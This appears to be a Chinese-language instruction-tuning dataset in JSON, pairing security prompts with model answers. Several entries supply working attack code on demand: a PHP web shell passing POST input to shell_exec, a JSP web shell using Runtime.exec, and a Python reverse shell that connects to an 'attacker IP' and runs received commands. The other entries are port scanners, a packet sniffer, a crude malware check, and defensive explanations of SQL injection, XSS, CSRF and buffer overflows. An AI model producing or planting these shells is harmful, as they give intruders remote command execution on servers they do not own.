wxcz_admin
/
project0802shenji


			
				
					
						
						
							1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374
							[
  {
    "instruction": "生成一个PHP webshell",
    "input": "",
    "output": "<?php\nif(isset($_POST['cmd'])){\n    $cmd = $_POST['cmd'];\n    echo \"<pre>\";\n    echo shell_exec($cmd);\n    echo \"</pre>\";\n}\n?>\n<form method=\"POST\">\n    <input type=\"text\" name=\"cmd\" placeholder=\"输入命令\">\n    <input type=\"submit\" value=\"执行\">\n</form>",
    "category": "webshell"
  },
  {
    "instruction": "创建一个简单的JSP webshell",
    "input": "",
    "output": "<%@ page import=\"java.io.*\" %>\n<%\nString cmd = request.getParameter(\"cmd\");\nif(cmd != null) {\n    Process p = Runtime.getRuntime().exec(cmd);\n    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));\n    String line;\n    while((line = br.readLine()) != null) {\n        out.println(line + \"<br>\");\n    }\n}\n%>\n<form>\n    <input type=\"text\" name=\"cmd\">\n    <input type=\"submit\" value=\"执行\">\n</form>",
    "category": "webshell"
  },
  {
    "instruction": "解释SQL注入攻击的原理和防护方法",
    "input": "",
    "output": "SQL注入是一种代码注入技术，攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库查询。防护方法包括：1.使用参数化查询 2.输入验证和过滤 3.最小权限原则 4.WAF防护等。",
    "category": "security"
  },
  {
    "instruction": "编写一个端口扫描脚本",
    "input": "",
    "output": "import socket\nfrom threading import Thread\n\ndef scan_port(host, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((host, port))\n        if result == 0:\n            print(f\"端口 {port} 开放\")\n        sock.close()\n    except:\n        pass\n\nhost = \"127.0.0.1\"\nfor port in range(1, 1000):\n    Thread(target=scan_port, args=(host, port)).start()",
    "category": "code"
  },
  {
    "instruction": "生成一个反弹shell的Python脚本",
    "input": "",
    "output": "import socket\nimport subprocess\nimport os\n\ndef reverse_shell(host, port):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    \n    while True:\n        command = s.recv(1024).decode()\n        if command.lower() == 'exit':\n            break\n        \n        output = subprocess.getoutput(command)\n        s.send(output.encode())\n    \n    s.close()\n\n# 使用方法: reverse_shell(\"攻击者IP\", 端口)",
    "category": "security"
  },
  {
    "instruction": "解释XSS攻击原理和防护方法",
    "input": "",
    "output": "XSS（跨站脚本攻击）是一种代码注入攻击，攻击者将恶意脚本注入到网页中。防护方法包括：1.输出编码 2.输入验证 3.CSP策略 4.HttpOnly Cookie等。",
    "category": "security"
  },
  {
    "instruction": "编写一个简单的网络扫描器",
    "input": "",
    "output": "import socket\nimport threading\nfrom datetime import datetime\n\nclass NetworkScanner:\n    def __init__(self, target_host):\n        self.target = target_host\n        self.open_ports = []\n    \n    def scan_port(self, port):\n        try:\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(1)\n            result = sock.connect_ex((self.target, port))\n            if result == 0:\n                self.open_ports.append(port)\n                print(f\"端口 {port}: 开放\")\n            sock.close()\n        except:\n            pass\n    \n    def scan_range(self, start_port, end_port):\n        print(f\"开始扫描 {self.target}...\")\n        threads = []\n        \n        for port in range(start_port, end_port + 1):\n            thread = threading.Thread(target=self.scan_port, args=(port,))\n            threads.append(thread)\n            thread.start()\n        \n        for thread in threads:\n            thread.join()\n        \n        print(f\"扫描完成，发现 {len(self.open_ports)} 个开放端口\")\n        return self.open_ports\n\n# 使用示例\nscanner = NetworkScanner(\"127.0.0.1\")\nopen_ports = scanner.scan_range(1, 1000)",
    "category": "code"
  },
  {
    "instruction": "编写一个Python函数来检测文件是否为恶意软件",
    "input": "",
    "output": "import hashlib\nimport requests\nimport os\n\ndef check_malware(file_path):\n    \"\"\"检测文件是否为恶意软件\"\"\"\n    if not os.path.exists(file_path):\n        return {\"error\": \"文件不存在\"}\n    \n    # 计算文件MD5\n    with open(file_path, 'rb') as f:\n        file_hash = hashlib.md5(f.read()).hexdigest()\n    \n    # 检查文件大小\n    file_size = os.path.getsize(file_path)\n    \n    # 简单的启发式检测\n    suspicious_patterns = [b'eval', b'exec', b'system', b'shell_exec']\n    is_suspicious = False\n    \n    try:\n        with open(file_path, 'rb') as f:\n            content = f.read()\n            for pattern in suspicious_patterns:\n                if pattern in content:\n                    is_suspicious = True\n                    break\n    except:\n        pass\n    \n    return {\n        \"file_path\": file_path,\n        \"md5_hash\": file_hash,\n        \"file_size\": file_size,\n        \"is_suspicious\": is_suspicious,\n        \"risk_level\": \"high\" if is_suspicious else \"low\"\n    }\n\n# 使用示例\nresult = check_malware(\"example.php\")\nprint(result)",
    "category": "code"
  },
  {
    "instruction": "创建一个简单的网络数据包捕获程序",
    "input": "",
    "output": "from scapy.all import *\nimport time\n\nclass PacketCapture:\n    def __init__(self, interface=\"eth0\"):\n        self.interface = interface\n        self.captured_packets = []\n    \n    def packet_handler(self, packet):\n        \"\"\"数据包处理函数\"\"\"\n        timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        \n        if packet.haslayer(IP):\n            ip_src = packet[IP].src\n            ip_dst = packet[IP].dst\n            protocol = packet[IP].proto\n            \n            packet_info = {\n                \"timestamp\": timestamp,\n                \"src_ip\": ip_src,\n                \"dst_ip\": ip_dst,\n                \"protocol\": protocol\n            }\n            \n            if packet.haslayer(TCP):\n                packet_info[\"src_port\"] = packet[TCP].sport\n                packet_info[\"dst_port\"] = packet[TCP].dport\n                packet_info[\"protocol_name\"] = \"TCP\"\n            elif packet.haslayer(UDP):\n                packet_info[\"src_port\"] = packet[UDP].sport\n                packet_info[\"dst_port\"] = packet[UDP].dport\n                packet_info[\"protocol_name\"] = \"UDP\"\n            \n            self.captured_packets.append(packet_info)\n            print(f\"[{timestamp}] {ip_src} -> {ip_dst} ({packet_info.get('protocol_name', 'Unknown')})\")\n    \n    def start_capture(self, count=10):\n        \"\"\"开始捕获数据包\"\"\"\n        print(f\"开始在 {self.interface} 上捕获数据包...\")\n        sniff(iface=self.interface, prn=self.packet_handler, count=count)\n        return self.captured_packets\n\n# 使用示例\ncapture = PacketCapture()\npackets = capture.start_capture(count=20)",
    "category": "code"
  },
  {
    "instruction": "什么是CSRF攻击？如何防护？",
    "input": "",
    "output": "CSRF（跨站请求伪造）利用用户已登录的身份，诱导用户执行非本意的操作。防护措施包括：1.CSRF Token验证 2.验证HTTP Referer头 3.双重Cookie验证 4.设置SameSite Cookie属性 5.重要操作需要二次确认。",
    "category": "chinese_security"
  },
  {
    "instruction": "解释缓冲区溢出攻击的原理",
    "input": "",
    "output": "缓冲区溢出是指程序向缓冲区写入数据时超出了缓冲区的边界，覆盖了相邻的内存区域。攻击者可以利用这个漏洞执行恶意代码。防护方法包括：1.使用安全的函数 2.栈保护机制 3.地址空间随机化(ASLR) 4.数据执行保护(DEP) 5.代码审计和静态分析。",
    "category": "chinese_security"
  },
  {
    "instruction": "如何进行Web应用安全测试？",
    "input": "",
    "output": "Web应用安全测试的主要步骤：1.信息收集（端口扫描、目录枚举、技术栈识别）2.漏洞扫描（SQL注入、XSS、CSRF等）3.身份验证测试（弱密码、会话管理）4.授权测试（权限绕过、越权访问）5.输入验证测试（文件上传、参数污染）6.业务逻辑测试（支付绕过、逻辑缺陷）7.配置安全测试（默认配置、敏感信息泄露）。",
    "category": "chinese_security"
  }
]